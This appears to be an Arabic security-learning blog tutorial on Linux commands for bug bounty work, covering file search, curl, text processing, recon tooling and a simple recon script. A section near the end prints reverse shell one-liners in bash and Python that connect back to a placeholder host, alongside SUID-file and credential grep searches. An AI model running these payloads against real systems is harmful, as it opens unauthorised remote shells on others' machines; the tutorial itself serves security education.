Linux للهاكرز: الأوامر الأساسية التي يجب أن يعرفها كل باحث أمني
4 أكتوبر 2026 · بواسطة Pentevo
Linux هو لغة العالم الأمني. 90% من أدوات Bug Bounty واختبار الاختراق تعمل على Linux فقط. هذا الدليل يركّز على الأوامر التي تستخدمها فعلًا في العمل اليومي — ليس نظريًا.
التنقل والملفات
# التنقل
pwd # أين أنا؟
ls -la # قائمة الملفات مع التفاصيل والمخفية
cd /path/to/dir # الانتقال لمجلد
cd .. # مجلد أعلى
cd ~ # home directory
cd - # المجلد السابق
# البحث عن ملفات
find / -name "*.conf" 2>/dev/null # ابحث عن ملفات conf
find / -perm -4000 2>/dev/null # ملفات SUID (مهم لـ Privilege Escalation)
find / -writable -type f 2>/dev/null # ملفات قابلة للكتابة
locate config.php # بحث سريع (يحتاج updatedb)
# قراءة الملفات
cat file.txt # قراءة كاملة
head -20 file.txt # أول 20 سطر
tail -50 file.txt # آخر 50 سطر
tail -f /var/log/syslog # مراقبة ملف log في الوقت الحقيقي
less file.txt # قراءة تفاعلية (q للخروج)
# البحث داخل الملفات
grep "password" file.txt # البحث عن كلمة
grep -r "api_key" /var/www/ # بحث تكراري
grep -i "admin" /etc/passwd # بحث غير حساس للحالة
grep -v "^#" config.txt # استبعاد التعليقات
grep -oP "(?<=password=)\S+" file # Regex للاستخراج
أوامر الشبكة
# معلومات الشبكة
ip addr show # عناوين IP
ip route show # الـ routing table
cat /etc/resolv.conf # DNS servers
ss -tulnp # المنافذ المفتوحة
netstat -an # اتصالات الشبكة الكاملة
arp -a # جدول ARP (الأجهزة في الشبكة)
# اختبار الاتصال
ping -c 4 google.com
traceroute google.com
nslookup example.com
dig example.com ANY # DNS records كاملة
host example.com
# curl - أهم أداة لـ Bug Bounty
curl https://example.com # GET request
curl -X POST https://example.com/api/login \
-d "username=admin&password=test" # POST
curl -H "Authorization: Bearer TOKEN" \
https://api.example.com/profile # مع header
curl -b "session=COOKIE" https://example.com # مع cookie
curl -k https://example.com # تجاهل SSL errors
curl -v https://example.com 2>&1 | head -50 # verbose output
curl -I https://example.com # headers فقط
curl -L https://example.com # تتبع الـ redirects
curl -o output.html https://example.com # حفظ لملف
# wget
wget https://example.com/file.zip # تحميل ملف
wget -r -np https://example.com/ # تحميل موقع كامل
Pipes والـ Text Processing
# Pipe (|) - ربط الأوامر
cat /etc/passwd | grep "bash" | cut -d: -f1 # مستخدمون مع bash shell
# cut - استخراج أعمدة
cut -d: -f1 /etc/passwd # أسماء المستخدمين
cut -d, -f2 data.csv # العمود الثاني من CSV
# sort وuniq
sort file.txt # ترتيب
sort -u file.txt # ترتيب وإزالة تكرار
sort file.txt | uniq -c # عد التكرارات
sort -rn numbers.txt # ترتيب عددي عكسي
# awk - معالجة قوية
awk -F: '{print $1}' /etc/passwd # عمود 1
awk '{print $1, $3}' file.txt # أعمدة 1 و3
awk 'length($0) > 50' urls.txt # سطور أطول من 50 حرف
# sed - بحث واستبدال
sed 's/http:/https:/g' urls.txt # استبدال
sed '/^#/d' config.txt # حذف التعليقات
sed -n '10,20p' file.txt # طباعة سطور 10-20
# tr - تحويل
echo "HELLO" | tr 'A-Z' 'a-z' # lowercase
cat file.txt | tr '\n' ' ' # دمج السطور
أدوات Bug Bounty على Linux
# إدارة Go tools (معظم أدوات Bug Bounty مكتوبة بـ Go)
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/ffuf/ffuf/v2@latest
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# تشغيل أدوات متسلسلة مع Pipe
subfinder -d example.com -silent | httpx -silent | nuclei -silent
# حفظ النتائج مع timestamp
subfinder -d example.com 2>/dev/null | tee "recon_$(date +%Y%m%d_%H%M%S).txt"
Bash Scripting للـ Recon
#!/bin/bash
# سكريبت Recon بسيط
TARGET=$1
OUTPUT_DIR="recon_$TARGET"
mkdir -p $OUTPUT_DIR
echo "[*] Starting recon for: $TARGET"
# Subdomains
echo "[1/4] Subdomain enumeration..."
subfinder -d $TARGET -o $OUTPUT_DIR/subs.txt -silent 2>/dev/null
SUBS=$(wc -l < $OUTPUT_DIR/subs.txt)
echo " Found: $SUBS subdomains"
# Live check
echo "[2/4] Checking live hosts..."
cat $OUTPUT_DIR/subs.txt | httpx -silent -o $OUTPUT_DIR/live.txt 2>/dev/null
LIVE=$(wc -l < $OUTPUT_DIR/live.txt)
echo " Live: $LIVE hosts"
# Nuclei scan
echo "[3/4] Quick nuclei scan..."
nuclei -l $OUTPUT_DIR/live.txt -severity medium,high,critical \
-o $OUTPUT_DIR/vulns.txt -silent 2>/dev/null
# URLs
echo "[4/4] Collecting URLs..."
cat $OUTPUT_DIR/live.txt | gau 2>/dev/null | \
grep "?" | sort -u > $OUTPUT_DIR/params.txt
echo "[+] Done! Results in $OUTPUT_DIR/"
echo " Subdomains: $SUBS"
echo " Live hosts: $LIVE"
echo " URLs with params: $(wc -l < $OUTPUT_DIR/params.txt)"
Netcat والـ Shells
# Netcat - السكين السويسري للشبكة
nc -lvnp 4444 # فتح listener
nc target_ip 4444 # الاتصال
# Reverse Shell payloads (للـ CTF وBug Bounty فقط)
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
إدارة الـ Sessions والـ Background
# tmux - لإدارة sessions
tmux new -s recon # session جديدة
tmux attach -t recon # العودة للـ session
Ctrl+B, D # Detach (تاركًا الـ session تعمل)
Ctrl+B, " # تقسيم أفقي
Ctrl+B, % # تقسيم رأسي
# تشغيل عمليات طويلة في الخلفية
nohup subfinder -d example.com &
jobs # قائمة الـ background jobs
bg %1 # إرسال للخلفية
fg %1 # استعادة للمقدمة
الخلاصة
Linux ليس مجرد بيئة عمل — هو سلاحك الأساسي. Pipes وText Processing وBash Scripting هي ما يُميّز باحث محترف. استثمر ساعة يوميًا في تعلم أمر Linux جديد — بعد شهر ستُلاحظ الفارق في سرعة عملك وعمق تحليلاتك.
الأسئلة الشائعة
هل أحتاج Kali Linux للبدء في Bug Bounty؟
ليس إلزاميًا. يمكنك البدء على Ubuntu أو حتى macOS. لكن Kali يحتوي على معظم الأدوات مثبّتة مسبقًا ويوفر وقتًا. استخدمه في VM أو WSL2 على Windows.
ما أساسيات Linux التي يجب أن أعرفها قبل Bug Bounty؟
التنقل بين الملفات، قراءة وكتابة الملفات، أوامر الشبكة الأساسية (curl، wget، netcat)، الـ Pipes والـ Redirects، والبرمجة النصية البسيطة بـ Bash.
هل أتعلم Python أم Bash للأمن السيبراني؟
كلاهما ضروريان. Bash للأتمتة السريعة والـ Scripts اليومية. Python لبناء أدوات أكثر تعقيدًا وتحليل البيانات.
مقالات ذات صلة
أدوات Bug Bounty الأساسية التي يستخدمها المحترفون في 2026
قائمة شاملة بأفضل أدوات Bug Bounty: Burp Suite وffuf وnuclei وsubfinder وhttpx — مع شرح عملي لكيفية استخدام كل أداة.
toolsشرح ffuf بالعربي: الدليل الكامل لـ Fuzzing في Bug Bounty
تعلّم ffuf من الصفر: Directory Fuzzing وParameter Discovery وVHost Enumeration مع أمثلة عملية وأفضل الـ Wordlists لكل سيناريو.
toolsشرح nuclei بالعربي: أقوى أداة مسح للثغرات في Bug Bounty
دليل شامل لاستخدام nuclei في Bug Bounty: كيف تُشغّله، أفضل القوالب، كيف تكتب قوالب مخصصة، وكيف تُدمجه في سير عمل Recon احترافي.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا